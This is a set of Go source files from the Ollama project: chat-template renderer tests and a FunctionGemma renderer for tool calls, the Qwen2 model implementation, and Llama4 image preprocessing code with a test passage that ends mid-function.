api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "San Francisco", }), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`, ToolName: "get_weather"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, 
expected: "<|im_start|>system\n" + `You are a helpful assistant.<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather in SF?<|im_end|>\n" + "<|im_start|>assistant\n" + `Let me check the weather.<function_calls>get_weather(location="San Francisco")</function_calls><|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 68}<|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "multi-turn conversation", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!<|im_end|>\n" + "<|im_start|>user\n" + "How are you?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "parallel tool calls - newline separated", msgs: []api.Message{ {Role: "user", Content: "Get weather in SF and NYC"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "San Francisco"}), }, }, { ID: "call_2", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "New York"}), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`, ToolName: "get_weather"}, {Role: "tool", Content: `{"temperature": 55}`, ToolName: "get_weather"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: 
api.PropertyType{"string"}}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "get_weather", "parameters": {"type": "object", "properties": {"location": {"type": "string"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "Get weather in SF and NYC<|im_end|>\n" + "<|im_start|>assistant\n" + `<function_calls>get_weather(location="San Francisco")` + "\n" + `get_weather(location="New York")</function_calls><|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 68}<|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 55}<|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "tool call with multiple arguments", msgs: []api.Message{ {Role: "user", Content: "Book a flight"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "book_flight", Arguments: testArgsOrdered([]orderedArg{ {"from", "SFO"}, {"to", "NYC"}, }), }, }, }, }, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "book_flight", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsOrdered([]orderedProp{ {"from", api.ToolProperty{Type: api.PropertyType{"string"}}}, {"to", api.ToolProperty{Type: api.PropertyType{"string"}}}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. 
Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "book_flight", "parameters": {"type": "object", "properties": {"from": {"type": "string"}, "to": {"type": "string"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "Book a flight<|im_end|>\n" + "<|im_start|>assistant\n" + `<function_calls>book_flight(from="SFO", to="NYC")</function_calls><|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "assistant prefill - no generation prompt", msgs: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Olmo3Renderer{}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/functiongemma.go
model/renderers/functiongemma.go
package renderers import ( "fmt" "sort" "strings" "github.com/ollama/ollama/api" ) type FunctionGemmaRenderer struct{} const defaultSystemMessage = "You can do function calling with the following functions:" func (r *FunctionGemmaRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder sb.WriteString("<bos>") var systemMessage string var loopMessages []api.Message if len(messages) > 0 && (messages[0].Role == "system" || messages[0].Role == "developer") { systemMessage = messages[0].Content loopMessages = messages[1:] } else { loopMessages = messages } if systemMessage != "" || len(tools) > 0 { sb.WriteString("<start_of_turn>developer\n") if systemMessage != "" { sb.WriteString(strings.TrimSpace(systemMessage)) } if len(tools) > 0 { if systemMessage != "" { sb.WriteString("\n") } if strings.TrimSpace(systemMessage) != defaultSystemMessage { // Only add default message if user does not provide it sb.WriteString(defaultSystemMessage) } } for _, tool := range tools { sb.WriteString(r.renderToolDeclaration(tool)) } sb.WriteString("<end_of_turn>\n") } // Track previous message type for tool response handling prevMessageType := "" for i, message := range loopMessages { switch message.Role { case "assistant": if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>model\n") } prevMessageType = "" if message.Content != "" { sb.WriteString(strings.TrimSpace(message.Content)) } if len(message.ToolCalls) > 0 { for _, tc := range message.ToolCalls { sb.WriteString(r.formatToolCall(tc)) } // After tool calls, expect tool responses if i+1 < len(loopMessages) && loopMessages[i+1].Role == "tool" { sb.WriteString("<start_function_response>") prevMessageType = "tool_call" } else { sb.WriteString("<end_of_turn>\n") } } else { sb.WriteString("<end_of_turn>\n") } case "user": if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>user\n") } prevMessageType = "" 
sb.WriteString(strings.TrimSpace(message.Content)) sb.WriteString("<end_of_turn>\n") case "tool": toolName := "" // Find the tool name from the previous assistant's tool call for j := i - 1; j >= 0; j-- { if loopMessages[j].Role == "assistant" && len(loopMessages[j].ToolCalls) > 0 { // Count how many tool messages came before this one toolIdx := 0 for k := j + 1; k < i; k++ { if loopMessages[k].Role == "tool" { toolIdx++ } } if toolIdx < len(loopMessages[j].ToolCalls) { toolName = loopMessages[j].ToolCalls[toolIdx].Function.Name } break } } if prevMessageType != "tool_call" { sb.WriteString("<start_function_response>") } sb.WriteString("response:" + toolName + "{" + r.formatArgValue(message.Content) + "}<end_function_response>") prevMessageType = "tool_response" default: sb.WriteString("<start_of_turn>" + message.Role + "\n") sb.WriteString(strings.TrimSpace(message.Content)) sb.WriteString("<end_of_turn>\n") } } if prevMessageType != "tool_response" { sb.WriteString("<start_of_turn>model\n") } return sb.String(), nil } func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string { var sb strings.Builder fn := tool.Function sb.WriteString("<start_function_declaration>declaration:" + fn.Name + "{") sb.WriteString("description:<escape>" + fn.Description + "<escape>") if fn.Parameters.Properties != nil || fn.Parameters.Type != "" { sb.WriteString(",parameters:{") needsComma := false // Only include properties:{} if there are actual properties if fn.Parameters.Properties != nil && fn.Parameters.Properties.Len() > 0 { sb.WriteString("properties:{") r.writeProperties(&sb, fn.Parameters.Properties) sb.WriteString("}") needsComma = true } if len(fn.Parameters.Required) > 0 { if needsComma { sb.WriteString(",") } sb.WriteString("required:[") for i, req := range fn.Parameters.Required { if i > 0 { sb.WriteString(",") } sb.WriteString("<escape>" + req + "<escape>") } sb.WriteString("]") needsComma = true } if fn.Parameters.Type != "" { if needsComma { 
sb.WriteString(",") } sb.WriteString("type:<escape>" + strings.ToUpper(fn.Parameters.Type) + "<escape>") } sb.WriteString("}") } sb.WriteString("}<end_function_declaration>") return sb.String() } func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props *api.ToolPropertiesMap) { keys := make([]string, 0, props.Len()) for k := range props.All() { keys = append(keys, k) } sort.Strings(keys) first := true for _, name := range keys { prop, _ := props.Get(name) if !first { sb.WriteString(",") } first = false sb.WriteString(name + ":{description:<escape>") sb.WriteString(prop.Description) sb.WriteString("<escape>") if len(prop.Type) > 0 { sb.WriteString(",type:<escape>" + strings.ToUpper(prop.Type[0]) + "<escape>") } sb.WriteString("}") } } func (r *FunctionGemmaRenderer) formatToolCall(tc api.ToolCall) string { var sb strings.Builder sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{") keys := make([]string, 0, tc.Function.Arguments.Len()) for k := range tc.Function.Arguments.All() { keys = append(keys, k) } sort.Strings(keys) first := true for _, key := range keys { value, _ := tc.Function.Arguments.Get(key) if !first { sb.WriteString(",") } first = false sb.WriteString(key + ":" + r.formatArgValue(value)) } sb.WriteString("}<end_function_call>") return sb.String() } func (r *FunctionGemmaRenderer) formatArgValue(value any) string { switch v := value.(type) { case string: return "<escape>" + v + "<escape>" case bool: if v { return "true" } return "false" case float64: if v == float64(int64(v)) { return fmt.Sprintf("%d", int64(v)) } return fmt.Sprintf("%v", v) case int, int64, int32: return fmt.Sprintf("%d", v) case map[string]any: return r.formatMapValue(v) case []any: return r.formatArrayValue(v) default: return fmt.Sprintf("%v", v) } } func (r *FunctionGemmaRenderer) formatMapValue(m map[string]any) string { var sb strings.Builder sb.WriteString("{") keys := make([]string, 0, len(m)) for k := range m { keys = append(keys, k) } 
sort.Strings(keys) first := true for _, key := range keys { if !first { sb.WriteString(",") } first = false sb.WriteString(key + ":" + r.formatArgValue(m[key])) } sb.WriteString("}") return sb.String() } func (r *FunctionGemmaRenderer) formatArrayValue(arr []any) string { var sb strings.Builder sb.WriteString("[") for i, item := range arr { if i > 0 { sb.WriteString(",") } sb.WriteString(r.formatArgValue(item)) } sb.WriteString("]") return sb.String() }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/models.go
model/models/models.go
package models import ( _ "github.com/ollama/ollama/model/models/bert" _ "github.com/ollama/ollama/model/models/deepseek2" _ "github.com/ollama/ollama/model/models/deepseekocr" _ "github.com/ollama/ollama/model/models/gemma2" _ "github.com/ollama/ollama/model/models/gemma3" _ "github.com/ollama/ollama/model/models/gemma3n" _ "github.com/ollama/ollama/model/models/gptoss" _ "github.com/ollama/ollama/model/models/llama" _ "github.com/ollama/ollama/model/models/llama4" _ "github.com/ollama/ollama/model/models/mistral3" _ "github.com/ollama/ollama/model/models/mllama" _ "github.com/ollama/ollama/model/models/nomicbert" _ "github.com/ollama/ollama/model/models/olmo3" _ "github.com/ollama/ollama/model/models/qwen2" _ "github.com/ollama/ollama/model/models/qwen25vl" _ "github.com/ollama/ollama/model/models/qwen3" _ "github.com/ollama/ollama/model/models/qwen3vl" )
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen2/model.go
model/models/qwen2/model.go
// Package qwen2 implements the Qwen2 family of decoder-only text models.
package qwen2

import (
	"cmp"
	"fmt"
	"math"
	"strings"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/ml/nn/rope"
	"github.com/ollama/ollama/model"
	"github.com/ollama/ollama/model/input"
)

// Options holds the model hyperparameters read from the GGUF config in New.
type Options struct {
	hiddenSize, numHeads, numKVHeads int
	headDim, ropeDim                 int
	eps, ropeBase, ropeScale         float32
}

// applyRotaryPositionEmbeddings applies NeoX-style rotary position embeddings
// to states at the given positions. The rotation dimension is the first
// non-zero of ropeDim, headDim, hiddenSize/numHeads (cmp.Or). Note the scale
// argument is the reciprocal of the configured rope scaling factor.
func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor {
	return nn.RoPE(ctx, states, positions, cmp.Or(o.ropeDim, o.headDim, o.hiddenSize/o.numHeads), o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX())
}

// Attention is the grouped-query self-attention block; tensor names map to
// the corresponding GGUF tensors via struct tags.
type Attention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// Forward projects hiddenStates to Q/K/V, applies RoPE to Q and K, runs
// cached scaled-dot-product attention, and applies the output projection.
// Q uses numHeads heads while K/V use numKVHeads (grouped-query attention).
func (attn Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
	batchSize := hiddenStates.Dim(1)
	// headDim falls back to hiddenSize/numHeads when attention.key_length is unset.
	headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads)

	query := attn.Query.Forward(ctx, hiddenStates)
	query = query.Reshape(ctx, headDim, opts.numHeads, batchSize)

	key := attn.Key.Forward(ctx, hiddenStates)
	key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize)

	value := attn.Value.Forward(ctx, hiddenStates)
	value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize)

	query = opts.applyRotaryPositionEmbeddings(ctx, query, positions)
	key = opts.applyRotaryPositionEmbeddings(ctx, key, positions)

	// Standard 1/sqrt(headDim) attention scaling.
	attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache)
	attention = attention.Reshape(ctx, headDim*opts.numHeads, batchSize)
	return attn.Output.Forward(ctx, attention)
}

// MLP is the SwiGLU feed-forward block: down(silu(gate(x)) * up(x)).
type MLP struct {
	Gate *nn.Linear `gguf:"ffn_gate"`
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
}

// Forward applies the gated feed-forward transform; SILU here fuses the
// activation with the elementwise product against the up projection.
func (mlp MLP) Forward(ctx ml.Context, hiddenStates ml.Tensor) ml.Tensor {
	hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates))
	return mlp.Down.Forward(ctx, hiddenStates)
}

// DecoderLayer is one transformer block: pre-norm attention followed by a
// pre-norm MLP, each with a residual connection.
type DecoderLayer struct {
	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
	Attention     *Attention
	MLPNorm       *nn.RMSNorm `gguf:"ffn_norm"`
	MLP           *MLP
}

// Forward runs one decoder block. When outputs is non-nil (the final layer),
// both the attention result and its residual are reduced to just the rows
// whose logits the caller needs, so the MLP only runs on those rows.
func (d DecoderLayer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
	residual := hiddenStates
	hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts)

	if outputs != nil {
		hiddenStates = hiddenStates.Rows(ctx, outputs)
		residual = residual.Rows(ctx, outputs)
	}

	hiddenStates = hiddenStates.Add(ctx, residual)

	residual = hiddenStates
	hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = d.MLP.Forward(ctx, hiddenStates)
	return hiddenStates.Add(ctx, residual)
}

// Model is the full Qwen2 text model: token embedding, a stack of decoder
// layers, a final RMS norm, and the output head (which falls back to the
// tied token embedding via the "alt:token_embd" tag).
type Model struct {
	model.Base
	model.BytePairEncoding

	TokenEmbedding *nn.Embedding  `gguf:"token_embd"`
	Layers         []DecoderLayer `gguf:"blk"`
	OutputNorm     *nn.RMSNorm    `gguf:"output_norm"`
	Output         *nn.Linear     `gguf:"output,alt:token_embd"`

	Options
}

// Forward implements model.Model.
// It embeds the batch tokens, runs every decoder layer (requesting only the
// batch's output rows at the last layer), and returns the logits.
func (m Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
	positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))

	hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs)

	for i, layer := range m.Layers {
		m.Cache.SetLayer(i)

		// Only the last layer trims to the requested output rows.
		var outputs ml.Tensor
		if i == len(m.Layers)-1 {
			outputs = batch.Outputs
		}

		hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, &m.Options)
	}

	hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps)
	hiddenStates = m.Output.Forward(ctx, hiddenStates)
	return hiddenStates, nil
}

// Shift re-rotates cached keys by the given position shift so the KV cache
// can slide its window without recomputing attention.
func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) {
	return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil
}

// New constructs a Qwen2 model from a GGUF config, rejecting configurations
// this implementation cannot serve.
func New(c fs.Config) (model.Model, error) {
	// This model currently only supports the gpt2 tokenizer
	if c.String("tokenizer.ggml.model") == "llama" {
		return nil, fmt.Errorf("unsupported tokenizer: llama")
	}
	// detect library/qwen model(s) which are incompatible
	if strings.HasPrefix(c.String("general.name"), "Qwen2-beta") {
		return nil, fmt.Errorf("unsupported model: %s", c.String("general.name"))
	}

	m := Model{
		Layers: make([]DecoderLayer, c.Uint("block_count")),
		BytePairEncoding: model.NewBytePairEncoding(
			&model.Vocabulary{
				Values: c.Strings("tokenizer.ggml.tokens"),
				Types:  c.Ints("tokenizer.ggml.token_type"),
				Merges: c.Strings("tokenizer.ggml.merges"),
				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true),
				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
				// A model may declare several EOS ids; collect them all.
				EOS: append(
					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
					c.Ints("tokenizer.ggml.eos_token_ids")...,
				),
			},
			// GPT-2-style pretokenizer split pattern.
			`(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
		),
		Options: Options{
			hiddenSize: int(c.Uint("embedding_length")),
			numHeads:   int(c.Uint("attention.head_count")),
			numKVHeads: int(c.Uint("attention.head_count_kv")),
			headDim:    int(c.Uint("attention.key_length")),
			ropeDim:    int(c.Uint("rope.dimension_count")),
			ropeBase:   c.Float("rope.freq_base"),
			ropeScale:  c.Float("rope.scaling.factor", 1),
			eps:        c.Float("attention.layer_norm_rms_epsilon"),
		},
	}

	m.Cache = kvcache.NewCausalCache(m.Shift)
	return &m, nil
}

func init() {
	model.Register("qwen2", New)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/process_image.go
model/models/llama4/process_image.go
package llama4

import (
	"cmp"
	"image"
	"math"
	"slices"
	"sort"

	"golang.org/x/image/draw"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/model/imageproc"
)

// ImageProcessor prepares input images for the Llama 4 vision tower:
// choosing a tiling resolution, resizing, padding, and normalizing.
type ImageProcessor struct {
	imageSize, patchSize, numChannels, maxUpscalingSize int
}

// newImageProcessor reads the vision preprocessing parameters from the GGUF
// config, defaulting to 3 channels and a 448px upscaling cap.
func newImageProcessor(c fs.Config) ImageProcessor {
	return ImageProcessor{
		imageSize:        int(c.Uint("vision.image_size")),
		patchSize:        int(c.Uint("vision.patch_size")),
		numChannels:      int(c.Uint("vision.num_channels", 3)),
		maxUpscalingSize: int(c.Uint("vision.max_upscaling_size", 448)),
	}
}

// factors returns the positive divisors of n in ascending order.
// (The seen map is defensive: i values in 1..n/2 are already distinct.)
func factors(n int) []int {
	var result []int
	seen := make(map[int]bool)

	for i := 1; i <= n/2; i++ {
		if n%i == 0 && !seen[i] {
			result = append(result, i)
			seen[i] = true
		}
	}

	result = append(result, n)
	sort.Ints(result)
	return result
}

// supportedResolutions enumerates every (x*imageSize, y*imageSize) canvas
// where x*y <= patchSize, i.e. all tile grids with at most patchSize tiles.
// Grids are grouped by aspect ratio while being generated, but all groups
// are flattened into the returned slice; order is not deterministic because
// it iterates a map.
func (p ImageProcessor) supportedResolutions() []image.Point {
	var resolutions []image.Point

	aspectMap := make(map[float64][]image.Point)
	for i := p.patchSize; i >= 1; i-- {
		for _, f := range factors(i) {
			x := f
			y := i / f
			k := float64(y) / float64(x)
			aspectMap[k] = append(aspectMap[k], image.Point{x, y})
		}
	}

	for _, v := range aspectMap {
		for _, i := range v {
			resolutions = append(resolutions, image.Point{i.X * p.imageSize, i.Y * p.imageSize})
		}
	}

	return resolutions
}

// bestResolution picks the canvas from possibleResolutions that best fits an
// img-sized image. For each candidate it computes the limiting scale factor;
// it prefers the smallest upscale >= 1 (least enlargement), and otherwise —
// or when resizeToMaxCanvas is set — the largest available scale. Ties
// (within 1e-6) are broken by smallest canvas area.
func (p ImageProcessor) bestResolution(img image.Point, possibleResolutions []image.Point, resizeToMaxCanvas bool) image.Point {
	w, h := img.X, img.Y

	scales := make([]float64, len(possibleResolutions))

	for i, res := range possibleResolutions {
		scaleW := float64(res.X) / float64(w)
		scaleH := float64(res.Y) / float64(h)
		// The limiting dimension determines how much the image can scale.
		scale := min(scaleW, scaleH)

		scales[i] = scale
	}

	// minAboveOne finds the smallest scale >= 1.0, i.e. the canvas needing
	// the least upscaling. (Local `min` shadows the builtin inside.)
	minAboveOne := func(scales []float64) (float64, bool) {
		min := math.MaxFloat64
		found := false

		for _, s := range scales {
			if s >= 1.0 && s < min {
				min = s
				found = true
			}
		}

		return min, found
	}

	bestScale, ok := minAboveOne(scales)
	if resizeToMaxCanvas || !ok {
		bestScale = slices.Max(scales)
	}

	var bestOptions []image.Point
	for i, scale := range scales {
		if math.Abs(scale-bestScale) < 1e-6 {
			bestOptions = append(bestOptions, possibleResolutions[i])
		}
	}

	// Among equally good scales, take the smallest canvas.
	var chosenResolution image.Point
	if len(bestOptions) > 1 {
		chosenResolution = slices.MinFunc(bestOptions, func(a, b image.Point) int {
			return cmp.Compare(a.X*a.Y, b.X*b.Y)
		})
	} else {
		chosenResolution = bestOptions[0]
	}

	return chosenResolution
}

// maxResolution scales imageRes to fit inside targetRes while preserving the
// aspect ratio: the tighter dimension is pinned to the target and the other
// is floored from the same scale factor (clamped to the target).
func (p ImageProcessor) maxResolution(imageRes, targetRes image.Point) image.Point {
	scaleW := float64(targetRes.X) / float64(imageRes.X)
	scaleH := float64(targetRes.Y) / float64(imageRes.Y)

	var newRes image.Point
	if scaleW < scaleH {
		newRes = image.Point{
			targetRes.X,
			int(min(math.Floor(float64(imageRes.Y)*scaleW), float64(targetRes.Y))),
		}
	} else {
		newRes = image.Point{
			int(min(math.Floor(float64(imageRes.X)*scaleH), float64(targetRes.X))),
			targetRes.Y,
		}
	}

	return newRes
}

// pad draws src into the top-left of a fresh RGBA canvas of outputSize,
// leaving the remainder as the zero (transparent black) pixels.
func (p ImageProcessor) pad(src image.Image, outputSize image.Point) image.Image {
	dst := image.NewRGBA(image.Rect(0, 0, outputSize.X, outputSize.Y))
	draw.Draw(dst, src.Bounds(), src, image.Point{}, draw.Over)
	return dst
}

// ProcessImage converts img into normalized pixel buffers for the vision
// tower: pixelsLocal is the tiled canvas at targetSize, and pixelsGlobal is
// an additional imageSize×imageSize thumbnail produced only when the canvas
// spans more than one tile. Normalization uses ImageNet mean/std.
func (p ImageProcessor) ProcessImage(img image.Image) (pixelsLocal, pixelsGlobal []float32, targetSize image.Point, _ error) {
	img = imageproc.Composite(img)

	targetSize = p.bestResolution(img.Bounds().Max, p.supportedResolutions(), false)
	targetSizeWithoutDistortion := targetSize
	if p.maxUpscalingSize > 0 {
		// NOTE(review): this maxResolution result is immediately overwritten
		// by the two clamp assignments below, so the call appears to be dead
		// code — confirm whether the clamps were meant to apply per-axis on
		// top of the aspect-preserving size instead of replacing it.
		targetSizeWithoutDistortion = p.maxResolution(img.Bounds().Max, targetSize)
		targetSizeWithoutDistortion.X = min(max(img.Bounds().Max.X, p.maxUpscalingSize), targetSize.X)
		targetSizeWithoutDistortion.Y = min(max(img.Bounds().Max.Y, p.maxUpscalingSize), targetSize.Y)
	}

	// Resize without distortion, then pad out to the full tile canvas.
	newSizeWithoutDistortion := p.maxResolution(img.Bounds().Max, targetSizeWithoutDistortion)
	padded := p.pad(imageproc.Resize(img, newSizeWithoutDistortion, imageproc.ResizeBilinear), targetSize)
	pixelsLocal = imageproc.Normalize(padded, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD, true, true)

	// With more than one tile, also produce a global thumbnail of the image.
	if targetSize.X/p.imageSize*targetSize.Y/p.imageSize > 1 {
		padded := imageproc.Resize(img, image.Point{p.imageSize, p.imageSize}, imageproc.ResizeBilinear)
		pixelsGlobal = imageproc.Normalize(padded, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD, true, true)
	}

	return pixelsLocal, pixelsGlobal, targetSize, nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/process_image_test.go
model/models/llama4/process_image_test.go
package llama4

import (
	"cmp"
	"image"
	"image/color"
	"reflect"
	"slices"
	"testing"

	gocmp "github.com/google/go-cmp/cmp"
)

// TestFactors checks divisor enumeration for units, composites, squares,
// and primes.
func TestFactors(t *testing.T) {
	tests := []struct {
		name     string
		input    int
		expected []int
	}{
		{name: "factors of 1", input: 1, expected: []int{1}},
		{name: "factors of 2", input: 2, expected: []int{1, 2}},
		{name: "factors of 6", input: 6, expected: []int{1, 2, 3, 6}},
		{name: "factors of 28", input: 28, expected: []int{1, 2, 4, 7, 14, 28}},
		{name: "factors of 49", input: 49, expected: []int{1, 7, 49}},
		{name: "factors of 97 (prime)", input: 97, expected: []int{1, 97}},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			actual := factors(tt.input)
			if !reflect.DeepEqual(actual, tt.expected) {
				t.Errorf("factors(%d) = %v; want %v", tt.input, actual, tt.expected)
			}
		})
	}
}

// TestSupportedResolutions pins the full canvas set for imageSize=336,
// patchSize=16. Both slices are sorted before comparison because
// supportedResolutions iterates a map and has no deterministic order.
func TestSupportedResolutions(t *testing.T) {
	expectedResolutions := []image.Point{
		{X: 3360, Y: 336}, {X: 672, Y: 2688}, {X: 336, Y: 1344}, {X: 336, Y: 4032},
		{X: 1008, Y: 1344}, {X: 1344, Y: 1008}, {X: 336, Y: 1680}, {X: 1680, Y: 336},
		{X: 336, Y: 5040}, {X: 4032, Y: 336}, {X: 2352, Y: 336}, {X: 2688, Y: 672},
		{X: 1344, Y: 336}, {X: 5376, Y: 336}, {X: 2352, Y: 672}, {X: 672, Y: 1008},
		{X: 1008, Y: 672}, {X: 336, Y: 5376}, {X: 1680, Y: 1008}, {X: 5040, Y: 336},
		{X: 336, Y: 3024}, {X: 3024, Y: 336}, {X: 336, Y: 2688}, {X: 672, Y: 1344},
		{X: 336, Y: 672}, {X: 336, Y: 2352}, {X: 2016, Y: 672}, {X: 1008, Y: 336},
		{X: 336, Y: 3360}, {X: 336, Y: 4368}, {X: 1008, Y: 1680}, {X: 336, Y: 4704},
		{X: 4704, Y: 336}, {X: 1344, Y: 672}, {X: 672, Y: 336}, {X: 2688, Y: 336},
		{X: 3696, Y: 336}, {X: 2016, Y: 336}, {X: 1344, Y: 1344}, {X: 1008, Y: 1008},
		{X: 672, Y: 672}, {X: 336, Y: 336}, {X: 4368, Y: 336}, {X: 672, Y: 2016},
		{X: 336, Y: 1008}, {X: 336, Y: 3696}, {X: 672, Y: 1680}, {X: 1680, Y: 672},
		{X: 336, Y: 2016}, {X: 672, Y: 2352},
	}

	// Order points by X, then Y, for a stable comparison.
	sortResolutionFunc := func(a, b image.Point) int {
		return cmp.Or(cmp.Compare(a.X, b.X), cmp.Compare(a.Y, b.Y))
	}

	slices.SortStableFunc(expectedResolutions, sortResolutionFunc)

	imgProc := ImageProcessor{
		imageSize:        336,
		patchSize:        16,
		numChannels:      3,
		maxUpscalingSize: 448,
	}

	actualResolutions := imgProc.supportedResolutions()
	slices.SortStableFunc(actualResolutions, sortResolutionFunc)

	if diff := gocmp.Diff(expectedResolutions, actualResolutions); diff != "" {
